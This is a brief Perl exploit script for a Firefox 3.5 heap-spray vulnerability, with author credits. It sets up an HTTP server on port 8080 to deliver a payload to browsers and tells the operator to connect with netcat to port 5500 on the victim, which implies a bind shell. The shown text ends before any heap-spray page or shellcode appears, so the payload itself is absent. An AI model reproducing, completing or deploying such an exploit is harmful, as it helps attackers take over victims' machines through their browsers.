################################################## # FireFox 3.5 Heap Spray # Discovered by: Simon Berry-Bryne # Coded in Perl by julioisaias, ALTO PARANA - Paraguay # Contact: julioisaias [at] gmail [dot] com ################################################## #!/usr/bin/perl -w use strict; use POE::Component::Server::HTTP; POE::Component::Server::HTTP->new(Port => my $port = 8080, ContentHandler => {"/" => sub{$_[1]->push_header("Content-Type", "text/html"), $_[1]->content()}}); print "[-] Listening in port $port...\n[-] Sending payload...\n[-] After 30 secs try with netcat for connect in port 5500\n"; POE::Kernel->run(); __DATA__ Exploiting Firefox 3.5